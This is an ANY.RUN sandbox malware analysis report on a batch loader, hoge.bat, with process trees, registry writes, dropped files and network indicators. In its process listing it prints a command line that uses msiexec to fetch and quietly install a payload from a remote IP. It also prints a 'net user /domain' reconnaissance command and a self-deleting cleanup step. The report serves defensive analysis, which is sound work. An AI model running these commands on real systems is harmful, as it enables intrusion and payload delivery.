File name:

hoge.bat

Full analysis: https://app.any.run/tasks/21fcdf72-cdab-4b14-983b-a644f1e5443a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 20, 2019, 06:16:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exe-to-msi
loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

8BEBB2FBAC90E5DC836E6E676C4D8B70

SHA1:

3611CA8629CD4F81FAD75AB5F7652A748B9A3DE5

SHA256:

40EB9B06209B2EC5DDF38612BC7B672EAC85B10BE9675257CB49DBE66EE73123

SSDEEP:

3:rMNcA06AXuhM1fPQSWLXsUu0dmCNRThFc2I5fai:YxZhE3QSMF3vFcjIi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads executable files from IP

      • msiexec.exe (PID: 2968)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2996)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2968)

    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 3460)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2968)

    • Starts CMD.EXE for commands execution

      • MSI8DC2.tmp (PID: 2164)

    • Creates files in the program directory

      • cmd.exe (PID: 3460)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2968)

  • INFO

    • Application was dropped or rewritten from another process

      • MSI8DC2.tmp (PID: 2164)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2968)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
11
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start cmd.exe no specs msiexec.exe no specs msiexec.exe msi8dc2.tmp no specs cmd.exe no specs net.exe no specs net1.exe no specs cmd.exe no specs explorer.exe no specs verclsid.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2164"C:\Windows\Installer\MSI8DC2.tmp"C:\Windows\Installer\MSI8DC2.tmpmsiexec.exe
User:
admin
Company:
Intel Graphic, Corporation.
Integrity Level:
MEDIUM
Description:
oWTXIPu
Exit code:
0
Version:
22,24,2,22
Modules
Images
c:\windows\installer\msi8dc2.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
2372C:\Windows\system32\net1 user /domain C:\Windows\system32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
2656"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\logfile.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2968C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2992"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401C:\Windows\system32\verclsid.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\verclsid.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
2996cmd /c ""C:\Users\admin\AppData\Local\Temp\hoge.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3332"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI8DC2.tmp >> NULC:\Windows\system32\cmd.exeMSI8DC2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3460"C:\Windows\System32\cmd.exe" /C net user /domain > "C:\ProgramData\TMPUSER.DAT"C:\Windows\System32\cmd.exeMSI8DC2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3700"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3800msiexec.exe back=001 error=exit /i http://195.123.209.169/control /lv logfile.txt /q OnLoad="C:\Windows\calc.exe"C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
303
Read events
262
Write events
29
Delete events
12

Modification events

(PID) Process:(2968) msiexec.exeKey:HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2968) msiexec.exeKey:HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2968) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
2
Suspicious files
2
Text files
10
Unknown types
6

Dropped files

PID
Process
Filename
Type
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF0EC3BC9BAA02A4A0.TMP
MD5:
SHA256:
2968msiexec.exeC:\Config.Msi\198c4a.rbs
MD5:
SHA256:
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF2FF38F9BE5A359A4.TMP
MD5:
SHA256:
2968msiexec.exeC:\Windows\Installer\198c49.ipibinary
MD5:
SHA256:
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:
SHA256:
2968msiexec.exeC:\Windows\Installer\MSI8A54.tmpexecutable
MD5:
SHA256:
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\F3PMZ943\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\desktop.iniini
MD5:BA96961F5E22882527919E19DAEA510F
SHA256:DACE5AD59099429D8AED4EE279F1263EFB65D64456931398465A396CF0E79BD7
2968msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2968
msiexec.exe
GET
200
195.123.209.169:80
http://195.123.209.169/control
LV
executable
164 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2968
msiexec.exe
195.123.209.169:80
ITL Company
LV
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2968
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2968
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
hoge.bat